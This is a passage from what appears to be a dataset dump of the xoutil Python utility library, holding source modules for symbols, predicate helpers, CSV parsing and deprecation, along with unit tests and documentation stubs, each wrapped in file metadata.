Accumulate and catch if yielding more than necessary\n iter_ = merge(l1, l2, key=lambda x: x.item)\n expected = sorted(l1 + l2, key=lambda x: x.item)\n result = []\n for _ in range(len(expected)):\n result.append(next(iter_))\n with pytest.raises(StopIteration):\n last = next(iter_) # noqa: There cannot be more items in the merge\n assert result == expected\n" }, { "alpha_fraction": 0.542434811592102, "alphanum_fraction": 0.5437062978744507, "avg_line_length": 28.129629135131836, "blob_id": "971182bb5cd3f8965fc936fd1910d0214aaa29ea", "content_id": "e78c5837f59a2e028ea9b1820a34ea92e19a0383", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6293, "license_type": "no_license", "max_line_length": 80, "num_lines": 216, "path": "/xotl/tools/symbols.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Special logical values like Unset, Undefined, Ignored, Invalid, ...\n\nAll values only could be `True` or `False` but are intended in places where\n`None` is expected to be a valid value or for special Boolean formats.\n\n\"\"\"\n\n\nSYMBOL = \"symbol\"\nBOOLEAN = \"boolean\"\n\nTIMEOUT = 2.0\n\n\nclass MetaSymbol(type):\n \"\"\"Meta-class for symbol types.\"\"\"\n\n def __new__(cls, name, bases, ns):\n if ns[\"__module__\"] == __name__ or name not in {SYMBOL, BOOLEAN}:\n self = super().__new__(cls, name, bases, ns)\n if name == SYMBOL:\n self._instances = {str(v): v for v in (False, True)}\n return self\n else:\n raise TypeError(\n 'invalid class \"{}\" declared outside of \"{}\" '\n \"module\".format(name, __name__)\n )\n\n def __instancecheck__(self, instance):\n \"\"\"Override for isinstance(instance, self).\"\"\"\n if instance is False or instance is True:\n return True\n else:\n return super().__instancecheck__(instance)\n\n def __subclasscheck__(self, subclass):\n \"\"\"Override for issubclass(subclass, self).\"\"\"\n if subclass is bool:\n return True\n else:\n return super().__subclasscheck__(subclass)\n\n def nameof(self, s):\n \"\"\"Get the name of a symbol instance (`s`).\"\"\"\n items = self._instances.items()\n return next((name for name, value in items if value is s), None)\n\n def parse(self, name):\n \"\"\"Returns instance from a string.\n\n Standard Python Boolean values are parsed too.\n\n \"\"\"\n if \"#\" in name: # Remove comment\n name = name.split(\"#\")[0].strip()\n res = self._instances.get(name, None)\n if res is not None:\n if isinstance(res, self):\n return res\n else:\n msg = 'invalid parsed value \"{}\" of type \"{}\"; must be \"{}\"'\n rtn, sn = type(res).__name__, self.__name__\n raise TypeError(msg.format(res, rtn, sn))\n else:\n msg = 'name \"{}\" is not defined'\n raise NameError(msg.format(name))\n\n\nclass symbol(int, metaclass=MetaSymbol):\n \"\"\"Instances are custom symbols.\n\n Symbol instances identify uniquely a semantic concept by its name. Each\n one has an ordinal value associated.\n\n For example::\n\n >>> ONE2MANY = symbol('ONE2MANY')\n >>> ONE_TO_MANY = symbol('ONE2MANY')\n\n >>> ONE_TO_MANY is ONE2MANY\n True\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, name, value=None):\n \"\"\"Get or create a new symbol instance.\n\n :param name: String representing the internal name. `Symbol`:class:\n instances are unique (singletons) in the context of this\n argument. ``#`` and spaces are invalid characters to allow\n comments.\n\n :param value: Any value compatible with Python `bool` or `int` types.\n `None` is used as a special value to create a value using the\n name hash.\n\n \"\"\"\n from sys import intern as unique\n\n name = unique(name)\n if name:\n if value is None:\n value = hash(name)\n res = cls._instances.get(name)\n if res is None: # Create the new instance\n if isinstance(value, int):\n res = super().__new__(cls, value)\n cls._instances[name] = res\n else:\n msg = (\n 'instancing \"{}\" with name \"{}\" and incorrect '\n 'value \"{}\" of type \"{}\"'\n )\n cn, vt = cls.__name__, type(value).__name__\n raise TypeError(msg.format(cn, name, value, vt))\n elif res != value: # Check existing instance\n msg = 'value \"{}\" mismatch for existing instance: \"{}\"'\n raise ValueError(msg.format(value, name))\n return res\n else:\n raise ValueError(\"name must be a valid non empty string\")\n\n def __init__(self, *args, **kwds):\n pass\n\n def __repr__(self):\n return symbol.nameof(self)\n\n __str__ = __repr__\n\n\nclass boolean(symbol):\n \"\"\"Instances are custom logical values (`True` or `False`).\n\n Special symbols allowing only logical (False or True) values.\n\n For example::\n\n >>> true = boolean('true', True)\n >>> false = boolean('false')\n >>> none = boolean('false')\n >>> unset = boolean('unset')\n\n >>> class X:\n ... attr = None\n\n >>> getattr(X(), 'attr') is not None\n False\n\n >>> getattr(X(), 'attr', false) is not false\n True\n\n >>> none is false\n True\n\n >>> false == False\n True\n\n >>> false == unset\n True\n\n >>> false is unset\n False\n\n >>> true == True\n True\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, name, value=False):\n \"\"\"Get or create a new symbol instance.\n\n See `~Symbol.__new__`:meth: for information about parameters.\n \"\"\"\n return super().__new__(cls, name, bool(value))\n\n def __getnewargs__(self):\n cls = type(self)\n name = next((key for key, obj in cls._instances.items() if obj is self))\n return (name, bool(self))\n\n\n# --- Special singleton values ---\n\n#: False value, mainly for function parameter definitions, where None could\n#: be a valid value.\nUnset = boolean(\"Unset\")\n\n#: False value for local scope use or where ``Unset`` could be a valid value\nUndefined = boolean(\"Undefined\")\n\n#: To be used in arguments that are currently ignored because they are being\n#: deprecated. The only valid reason to use `Ignored` is to signal ignored\n#: arguments in method's/function's signature\nIgnored = boolean(\"Ignored\")\n\n#: To be used in functions resulting in a fail where False could be a valid\n#: value.\nInvalid = boolean(\"Invalid\")\n\n#: To be used as a mark for current context as a mechanism of comfort.\nThis = boolean(\"This\", True)\n" }, { "alpha_fraction": 0.6041984558105469, "alphanum_fraction": 0.6085878014564514, "avg_line_length": 31.345678329467773, "blob_id": "154b66f5eb2cf8194f668ad2a265255f89cc1966", "content_id": "63e7bc8cb745470c2c05114867f818103fdac9c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5241, "license_type": "no_license", "max_line_length": 78, "num_lines": 162, "path": "/xotl/tools/fp/prove/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Validity proofs for data values.\n\nThere are some basic helper functions:\n\n- `predicative`:func: wraps a function in a way that a logical false value is\n returned on failure. If an exception is raised, it is returned wrapped as\n an special false value. See `~xotl.tools.fp.option.Maybe`:class: monad for\n more information.\n\n- `vouch`:func: wraps a function in a way that an exception is raised if\n an invalid value (logical false by default) is returned. This is useful to\n call functions that use \"special\" false values to signal a failure.\n\n- `enfold`:func: creates a decorator to convert a function to use either the\n `predicative`:func: or the `vouch`:func: protocol.\n\n.. versionadded:: 1.8.0\n\n\"\"\"\n\n\ndef predicative(function, *args, **kwds):\n \"\"\"Call a function in a safety wrapper returning a false value if fail.\n\n This converts any function into a predicate. A predicate can be thought\n as an operator or function that returns a value that is either true or\n false.\n\n Predicates are sometimes used to indicate set membership: on certain\n occasions it is inconvenient or impossible to describe a set by listing\n all of its elements. Thus, a predicate ``P(x)`` will be true or false,\n depending on whether x belongs to a set.\n\n If the argument `function` validates its arguments, return a valid true\n value. There are two special conditions: first, a value treated as false\n for Python conventions (for example, ``0``, or an empty string); and\n second, when an exception is raised; in both cases the predicate will\n return an instance of `~xotl.tools.fp.option.Maybe`:class:.\n\n \"\"\"\n from xotl.tools.symbols import boolean\n from xotl.tools.fp.option import Maybe, Just, Wrong\n from xotl.tools.params import single\n\n # I don't understand anymore why a single argument must be a special case,\n # maybe because the composition problem.\n is_single = single(*args, **kwds)\n try:\n res = function(*args, **kwds)\n if isinstance(res, (boolean, Maybe)):\n if isinstance(res, Just) and res.inner:\n return res.inner\n elif isinstance(res, boolean) and is_single and args[0]:\n return args\n else:\n return res\n elif res:\n return res\n else:\n return Just(res)\n except Exception as error:\n if isinstance(error, ValueError) and is_single:\n return Wrong(args[0])\n else:\n return Wrong(error)\n\n\ndef vouch(function, *args, **kwds):\n \"\"\"Call a function in a safety wrapper raising an exception if it fails.\n\n When the wrapped function fails, an exception must be raised. A predicate\n fails when it returns a false value. To avoid treat false values of some\n types as fails, use `Just`:class: to return that values wrapped.\n\n \"\"\"\n from xotl.tools.symbols import boolean, Invalid\n from xotl.tools.clipping import small\n from xotl.tools.fp.option import Just, Wrong\n from xotl.tools.params import single\n\n res = function(*args, **kwds)\n if isinstance(res, boolean):\n if res:\n aux = single(*args, **kwds)\n if aux is not Invalid:\n res = aux\n else:\n msg = \"{}() validates as false\".format(small(function))\n raise TypeError(msg)\n elif isinstance(res, Wrong):\n inner = res.inner\n if isinstance(inner, BaseException):\n raise inner\n else:\n msg = \"{}() validates as a wrong value\".format(small(function))\n if inner is not None or not isinstance(inner, boolean):\n v, t = small(inner), type(inner).__name__\n msg += ' {} of type \"{}\"'.format(v, t)\n raise TypeError(msg)\n elif isinstance(res, Just):\n res = res.inner\n return res\n\n\ndef enfold(checker):\n \"\"\"Create a decorator to execute a function inner a safety wrapper.\n\n :param checker: Could be any function to enfold, but it's intended mainly\n for `predicative`:func: or `vouch`:func: functions.\n\n In the following example, the semantics of this function can be seen. The\n definition::\n\n >>> @enfold(predicative)\n ... def test(x):\n ... return 1 <= x <= 10\n\n >>> test(5)\n 5\n\n It is equivalent to::\n\n >>> def test(x):\n ... return 1 <= x <= 10\n\n >>> predicative(test, 5)\n 5\n\n In other hand::\n\n >>> @enfold(predicative)\n ... def test(x):\n ... return 1 <= x <= 10\n\n >>> test(15)\n 5\n\n \"\"\"\n\n def wrapper(func):\n def inner(*args, **kwds):\n return checker(func, *args, **kwds)\n\n try:\n inner.__name__ = func.__name__\n inner.__doc__ = func.__doc__\n except Exception:\n from xotl.tools.clipping import small\n\n inner.__name__ = str(small(func))\n return inner\n\n return wrapper\n" }, { "alpha_fraction": 0.6437894701957703, "alphanum_fraction": 0.6463158130645752, "avg_line_length": 32.45070266723633, "blob_id": "d4e9f915f03459ca677d286557dbce214b08d4f6", "content_id": "14deeb5db3ace5a78699cc0e3c9f84ae1b26c2d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2377, "license_type": "no_license", "max_line_length": 78, "num_lines": 71, "path": "/xotl/tools/future/csv.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"CSV parsing and writing extensions.\n\nThis module is an extension of `csv`:mod: Python standard module, it provides\nclasses and tools that assist in the reading and writing of `Comma Separated\nValue (CSV)`:abbr: files, and implements the interface described by PEP\n`305`:pep:.\n\n\"\"\"\n\n\nfrom csv import * # noqa\nfrom csv import unix_dialect\nimport csv as _stdlib # noqa\n\n\n#: Define 'unix dialect' as our base default for inheritance.\nDefaultDialect = unix_dialect\n\nreader = _stdlib.reader\n\n\ndef parse(data, *dialect, **options):\n r\"\"\"Parse `data` into a sheet.\n\n This function has the exact parameters protocol as `~csv.reader`:func:\\ ::\n\n parse(data [, dialect='excel'] [, optional keyword options])\n\n :param data: Can be any object that returns a line of input for each\n iteration, such as a file object or a list.\n\n :param dialect: An optional parameter can be given which is used to define\n a set of parameters specific to a particular CSV dialect. It may\n be an instance of a subclass of the `~csv.Dialect`:class: class or\n one of the strings returned by the `~csv.list_dialects`:func:\n function.\n\n The other optional keyword arguments can be given to override\n individual formatting parameters in the current `dialect`.\n\n When reading a value, `csv`:mod: for Python version 2 doesn't accept\n unicode text, so given data lines are forced to be `str`:class: values\n before processed by `~csv.reader`:func:. Each cell is converted to\n unicode text after read.\n\n :returns: The parsed matrix.\n\n A short usage example::\n\n >>> from xotl.tools.future import csv\n >>> with open('test.csv', newline='') as data:\n ... matrix = csv.parse(data)\n ... for row in matrix:\n ... print(', '.join(row))\n Last name, First Name\n van Rossum, Guido\n Stallman, Richard\n\n \"\"\"\n string_force = text_force = str # They were different in Python 2.\n rows = reader((string_force(line) for line in data), *dialect, **options)\n return [[text_force(cell) for cell in row] for row in rows]\n" }, { "alpha_fraction": 0.6468842625617981, "alphanum_fraction": 0.6498516201972961, "avg_line_length": 24.274999618530273, "blob_id": "b473355338830d02be55d316ed413fadc54159a6", "content_id": "3784e081340b2e9bb0bcdd064d74a9681e97e065", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1012, "license_type": "no_license", "max_line_length": 72, "num_lines": 40, "path": "/tests/test_infinity.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\nimport pickle\nfrom hypothesis import given, strategies as s\nfrom xoutil.infinity import Infinity, InfinityType\n\n\n@given(s.floats() | s.integers())\ndef test_comparable_with_numbers(x):\n assert -Infinity < x < Infinity\n\n\n@given(s.dates() | s.datetimes())\ndef test_comparable_with_dates(x):\n assert -Infinity < x < Infinity\n\n\ndef test_infinity_hashable():\n hash(Infinity)\n hash(-Infinity)\n\n\ndef test_singleton():\n assert Infinity is InfinityType(+1)\n assert -Infinity is InfinityType(-1)\n\n\n@given(\n s.sampled_from([Infinity, -Infinity]),\n s.sampled_from([pickle.HIGHEST_PROTOCOL, pickle.DEFAULT_PROTOCOL]),\n)\ndef test_pickable(inf, proto):\n serialized = pickle.dumps(inf, proto)\n assert inf is pickle.loads(serialized)\n" }, { "alpha_fraction": 0.6978371739387512, "alphanum_fraction": 0.6997455358505249, "avg_line_length": 30.440000534057617, "blob_id": "e2400d6a63f26f20a1476cc21c8de0caad974b23", "content_id": "46aebfc2a0a0f77fa3c91cebc0c04e22cd47d7a8", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1572, "license_type": "permissive", "max_line_length": 91, "num_lines": 50, "path": "/docs/source/xotl.tools/objects.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.objects`:mod: - Functions for dealing with objects\n==============================================================\n\n.. automodule:: xotl.tools.objects\n :members: validate_attrs, iterate_over, smart_getter,\n\t smart_getter_and_deleter, popattr, setdefaultattr, copy_class,\n\t fulldir, classproperty, import_object\n\n.. autofunction:: get_first_of(sources, *keys, default=None, pred=None)\n\n.. autofunction:: xdir(obj, filter=None, attr_filter=None, value_filter=None, getattr=None)\n\n.. autofunction:: fdir(obj, filter=None, attr_filter=None, value_filter=None, getattr=None)\n\n.. autofunction:: smart_copy(*sources, target, *, defaults=False)\n\n.. autofunction:: extract_attrs(obj, *names, default=Unset)\n\n.. autofunction:: traverse(obj, path, default=Unset, sep='.', getter=None)\n\n.. autofunction:: get_traverser(*paths, default=Unset, sep='.', getter=None)\n\n.. autofunction:: dict_merge(*dicts, **other)\n\n.. autofunction:: pop_first_of(source, *keys, default=None)\n\n.. autofunction:: fix_method_documentation\n\n.. autofunction:: multi_getter\n\n.. autofunction:: get_branch_subclasses\n\n.. autofunction:: iter_final_subclasses\n\n.. autofunction:: get_final_subclasses\n\n.. autofunction:: FinalSubclassEnumeration\n\n.. autofunction:: save_attributes(obj, *attributes, getter=None, setter=None)\n\n.. autofunction:: temp_attributes(obj, attrs, getter=None, setter=None)\n\n.. autoclass:: memoized_property\n :members: reset\n\n .. versionadded:: 1.8.1 Ported from ``xoutil.decorator.memoized_property``.\n\n.. autofunction:: delegator\n\n.. autoclass:: DelegatedAttribute\n" }, { "alpha_fraction": 0.6893819570541382, "alphanum_fraction": 0.6965134739875793, "avg_line_length": 37.24242401123047, "blob_id": "84273d4cc0d03af855c979bbbd2be49032116439", "content_id": "1d574784e1f0e75b0baff04acf4aa17145a6884d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1262, "license_type": "permissive", "max_line_length": 77, "num_lines": 33, "path": "/docs/source/xotl.tools/context.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.context`:mod: - Simple execution contexts\n=====================================================\n\n.. automodule:: xotl.tools.context\n :members: context, Context\n\n\n.. _context-greenlets:\n\n.. note:: About thread-locals and contexts.\n\n The `context`:class: uses internally a `thread-local\n <threading.local>`:class: instance to keep context stacks in different\n threads from seeing each other.\n\n If, when this module is imported, `greenlet`:mod: is **imported** already,\n greenlet isolation is also warranted (which implies thread isolation).\n\n If you use collaborative multi-tasking based in other framework other than\n `greenlet`, you must ensure to monkey patch the `threading.local` class so\n that isolation is kept.\n\n In future releases of xotl.tools, we plan to provide a way to inject a\n \"process\" identity manager so that other frameworks be easily integrated.\n\n .. versionchanged:: 1.7.1 Changed the test about ``greenlet``. Instead of\n testing for `greenlet` to be importable, test it is imported already.\n\n .. versionchanged:: 1.6.9 Added direct greenlet isolation and removed the\n need for `gevent.local`:mod:.\n\n .. versionadded:: 1.6.8 Uses `gevent.local`:mod: if available to isolate\n greenlets.\n" }, { "alpha_fraction": 0.6857143044471741, "alphanum_fraction": 0.6857143044471741, "avg_line_length": 69, "blob_id": "8e90a590c58481f75623c1d42990b7d0d8bda7b1", "content_id": "626bd8bcc187374bc89c2f73ea055752dfb92ada", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 70, "license_type": "permissive", "max_line_length": 69, "num_lines": 1, "path": "/docs/source/history/changes-1.2.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Bug fixes in `!xoutil.proxy`:mod: and `!xoutil.aop.classical`:mod:.\n" }, { "alpha_fraction": 0.449664443731308, "alphanum_fraction": 0.449664443731308, "avg_line_length": 28.799999237060547, "blob_id": "7b91a22700b51621640dcd15e2db58a9d4791a70", "content_id": "80c539f3292b9e654fb14df650daeafe0d60cf45", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 149, "license_type": "permissive", "max_line_length": 51, "num_lines": 5, "path": "/docs/source/xotl.tools/web.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.web`:mod: -- Utils for Web applications\n===================================================\n\n.. automodule:: xotl.tools.web\n :members:\n" }, { "alpha_fraction": 0.4659763276576996, "alphanum_fraction": 0.48594674468040466, "avg_line_length": 26.040000915527344, "blob_id": "57b8c3fedd1b0c96ce479dc69e2bad06da50d97a", "content_id": "fcfd75eceb4fabb143bb4906cd6b7c97fb68404f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 73, "num_lines": 50, "path": "/tests/test_csv.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\ndef test_csv():\n from xoutil.future.csv import parse, DefaultDialect\n\n data = [\n \"A,B,C,D\",\n \"1,1.2,1.3,Spanish\",\n \"2,2.2,2.3,Español\",\n '''\"One, comma\",\"\"\"double quotes\"\"\",I'm a single quote,Inglés''',\n ]\n\n def forge(cell):\n try:\n return int(cell)\n except ValueError:\n try:\n return float(cell)\n except ValueError:\n return cell\n\n matrix = [[forge(cell) for cell in row] for row in parse(data)]\n\n sum_int, sum_float = 0, 0.0\n count_int, count_float, count_text = 0, 0, 0\n for row in matrix:\n for cell in row:\n if isinstance(cell, int):\n count_int += 1\n sum_int += cell\n elif isinstance(cell, float):\n count_float += 1\n sum_float += cell\n else:\n assert isinstance(cell, str)\n count_text += 1\n\n assert count_int == 2\n assert sum_int == 3\n assert sum_float == 7.0\n assert count_float == 4\n assert count_text == 10\n" }, { "alpha_fraction": 0.545141875743866, "alphanum_fraction": 0.6371453404426575, "avg_line_length": 30.432432174682617, "blob_id": "8287b94a7eb8187cfefb5269ba906c43da39f388", "content_id": "44a84acb75178600d518edc4573d50dfa29205bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1164, "license_type": "no_license", "max_line_length": 86, "num_lines": 37, "path": "/tests/test_bases.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\nimport random\n\nfrom xoutil.bases import B32, B64, B64symbolic\n\n\ndef build_many_tests():\n def test_many_random_convertions(self):\n subjects = [B32, B64, B64symbolic]\n for _ in range(5):\n testcase = random.randrange(2 ** 64, 2 ** 128)\n subject = random.choice(subjects)\n assert testcase == subject.basetoint(subject.inttobase(testcase))\n\n return {\n \"test_many_random_convertions_%d\" % i: test_many_random_convertions\n for i in range(10)\n }\n\n\n_TestManyConvertions = type(str(\"TestManyConvertions\"), (object,), build_many_tests())\n\n\nclass TestManyConvertions(unittest.TestCase, _TestManyConvertions):\n def test_regression_56107046767814579580835126010035242071(self):\n number = 56107046767814579580835126010035242071\n b64 = B64symbolic\n assert number == b64.basetoint(b64.inttobase(number))\n" }, { "alpha_fraction": 0.5890254378318787, "alphanum_fraction": 0.5911075472831726, "avg_line_length": 33.07093811035156, "blob_id": "3923f12d27df3b970b4e61fe6182b8cb87b10f0e", "content_id": "6a5b42bd768a6383ca76a94492dc0e0ccdd4b1dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14892, "license_type": "no_license", "max_line_length": 88, "num_lines": 437, "path": "/xotl/tools/deprecation.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport types\nimport warnings\n\nfrom functools import wraps\n\n\n# TODO: Invalidate this module in favor of new 'xotl.tools.suggest' when\n# implemented\n\n# FIX: 'warnings.warn' uses in this module 'UserWarning' instead of\n# 'DeprecationWarning'. There is a way to signal the warning with the correct\n# type.\n\nDEFAULT_MSG = (\n \"{funcname} is now deprecated and it will be \"\n \"removed{in_version}. Use {replacement} instead.\"\n)\n\n\nclass DeprecationError(Exception):\n pass\n\n\n# TODO: Use ``warnings.simplefilter('default', DeprecationWarning)``\n\n\n# TODO: Maybe adapt all other functions in this module to use this descriptor.\n# Currently, it's only being used in combination with\n# xotl.tools.modules.customize to deprecate imports from xotl.tools top level\n# module.\nclass DeprecatedImportDescriptor:\n \"A descriptor that issues a deprecation warning when resolving `name`.\"\n\n def __init__(self, replacement):\n self.attr = replacement[replacement.rfind(\".\") + 1 :]\n self.replacement = replacement\n\n def __get__(self, instance, owner):\n if instance is not None:\n import warnings\n from xotl.tools.objects import import_object\n\n result = import_object(self.replacement)\n warnings.warn(\n \"Importing {name} from xotl.tools is deprecated. \"\n \"You should import it from {ns}\".format(\n name=self.attr, ns=self.replacement\n ),\n UserWarning, # DeprecationWarning is silent in ipython\n )\n return result\n else:\n return self\n\n\ndef _nameof(item):\n \"Version of `xotl.tools.names.nameof`:func: to avoid importing it here.\"\n singletons = (None, True, False, Ellipsis, NotImplemented)\n res = next((str(s) for s in singletons if s is item), None)\n if res is None:\n res = \".\".join([item.__module__, item.__name__])\n return res\n\n\ndef deprecated(\n replacement,\n msg=DEFAULT_MSG,\n deprecated_module=None,\n removed_in_version=None,\n check_version=False,\n new_name=None,\n):\n \"\"\"Small decorator for deprecated functions.\n\n Usage::\n\n @deprecated(new_function)\n def deprecated_function(...):\n ...\n\n :param replacement: Either a string or the object that replaces the\n deprecated.\n\n :param msg: A deprecation warning message template. You should provide\n keyword arguments for the `format`:func: function. Currently we pass\n the current keyword arguments: `replacement` (after some processing),\n `funcname` with the name of the currently deprecated object and\n `in_version` with the version this object is going to be removed if\n `removed_in_version` argument is not None.\n\n Defaults to: \"{funcname} is now deprecated and it will be\n removed{in_version}. Use {replacement} instead.\"\n\n :param removed_in_version: The version the deprecated object is going to be\n removed.\n\n :param check_version: If True and `removed_in_version` is not None, then\n declarations of obseleted objects will raise a DeprecationError. This\n helps the release manager to keep the release clean.\n\n .. note:: Currently only works with setuptools' installed distributions.\n\n :param deprecated_module: If provided, the name of the module the\n deprecated object resides. Not needed if the deprecated object is a\n function or class.\n\n :param new_name: If provided, it's used as the name of the\n deprecated object. Needed to allow renaming in\n `import_deprecated`:func: helper function.\n\n .. note:: Deprecating some classes in Python 3 could fail. This is\n because those classes do not declare a '__new__' par of the declared\n '__init__'. The problem is solved if the '__new__' of the super-class\n has no arguments. This doesn't happen in Python 2.\n\n To solve these cases mark the deprecation in a comment and issue the\n warning directly in the constructor code.\n\n .. versionchanged:: 1.4.1 Introduces removed_in_version and check_version.\n\n \"\"\"\n\n def raise_if_deprecated(target, target_version):\n import pkg_resources\n\n pkg = _nameof(target)\n pkg, _obj = pkg.rsplit(\".\", 1)\n dist = None\n while not dist and pkg:\n try:\n dist = pkg_resources.get_distribution(pkg)\n except pkg_resources.DistributionNotFound:\n dist = None\n if \".\" in pkg:\n pkg, _obj = pkg.rsplit(\".\", 1)\n else:\n pkg, _obj = None, None # noqa\n assert dist\n if isinstance(target_version, str):\n target_version = pkg_resources.parse_version(target_version)\n if dist.parsed_version >= target_version:\n msg = (\n \"A deprecated feature %r was scheduled to be \"\n \"removed in version %r and it is still \"\n \"alive in %r!\"\n % (_nameof(target), str(removed_in_version), str(dist.version))\n )\n raise DeprecationError(msg)\n\n def decorator(target):\n target_name = new_name if new_name else target.__name__\n if deprecated_module:\n funcname = deprecated_module + \".\" + target_name\n else:\n funcname = target_name\n if isinstance(replacement, (type, types.FunctionType)):\n repl_name = replacement.__module__ + \".\" + replacement.__name__\n else:\n repl_name = replacement\n if removed_in_version:\n in_version = \" in version \" + removed_in_version\n else:\n in_version = \"\"\n if isinstance(target, type):\n\n def new(*args, **kwargs):\n if check_version and removed_in_version:\n raise_if_deprecated(target, removed_in_version)\n warnings.warn(\n msg.format(\n funcname=funcname, replacement=repl_name, in_version=in_version\n ),\n stacklevel=2,\n )\n try:\n return target.__new__(*args, **kwargs)\n except TypeError:\n # XXX: Some classes in Python 3 don't declare an\n # equivalent '__new__'\n return super(result, args[0]).__new__(args[0])\n\n # Code copied and adapted from xotl.tools.objects.copy_class.\n # This is done so because this module *must* not depends on any\n # other, otherwise an import cycle might be formed when\n # deprecating a class in xotl.tools.objects.\n from xotl.tools.future.types import MemberDescriptorType\n\n meta = type(target)\n td = target.__dict__\n iteritems = td.items\n attrs = {\n name: value\n for name, value in iteritems()\n if name\n not in (\"__class__\", \"__mro__\", \"__name__\", \"__weakref__\", \"__dict__\")\n # Must remove member descriptors, otherwise the old's\n # class descriptor will override those that must be\n # created here.\n if not isinstance(value, MemberDescriptorType)\n }\n attrs.update(__new__=new)\n result = meta(target_name, target.__bases__, attrs)\n return result\n else:\n\n @wraps(target)\n def inner(*args, **kw):\n if check_version and removed_in_version:\n raise_if_deprecated(target, removed_in_version)\n warnings.warn(\n msg.format(\n funcname=funcname, replacement=repl_name, in_version=in_version\n ),\n stacklevel=2,\n )\n return target(*args, **kw)\n\n if new_name:\n inner.__name__ = new_name\n return inner\n\n return decorator\n\n\ndef import_deprecated(module, *names, **aliases):\n \"\"\"Import functions deprecating them in the target module.\n\n The target module is the caller of this function (only intended to be\n called in the global part of a module).\n\n :param module: The module from which functions will be imported. Could be\n a string, or an imported module.\n\n :param names: The names of the functions to import.\n\n :param aliases: Keys are the new names, values the old names.\n\n For example::\n\n >>> from xotl.tools.deprecation import import_deprecated\n >>> import math\n >>> import_deprecated(math, 'sin', new_cos='cos')\n >>> sin is not math.sin\n True\n\n Next examples are all ``True``, but them print the deprecation warning\n when executed::\n\n >>> sin(math.pi/2) == 1.0\n >>> new_cos(2*math.pi) == math.cos(2*math.pi)\n\n If no identifier is given, it is assumed equivalent as ``from module\n import *``.\n\n The statement ``import_deprecated('math', 'sin', new_cos='cos')`` has the\n same semantics as ``from math import sin, cos as new_cos``, but\n deprecating current module symbols.\n\n This function is provided for easing the deprecation of whole modules and\n should not be used to do otherwise.\n\n \"\"\"\n from xotl.tools.future.types import func_types\n from xotl.tools.modules import force_module\n\n src = force_module(module)\n dst = force_module(2)\n src_name = src.__name__\n dst_name = dst.__name__\n dst = force_module(2)\n if not names and not aliases:\n # from module import *\n names = getattr(src, \"__all__\", None)\n if not names:\n names = (n for n in dir(src) if not n.startswith(\"_\"))\n for name in names:\n if name not in aliases:\n aliases[name] = name\n else:\n msg = 'import_deprecated(): invalid repeated argument \"{}\"'\n raise ValueError(msg.format(name))\n unset = object()\n test_classes = func_types + (type,)\n for alias in aliases:\n name = aliases[alias]\n target = getattr(src, name, unset)\n if target is not unset:\n if isinstance(target, test_classes):\n replacement = src_name + \".\" + name\n deprecator = deprecated(\n replacement, 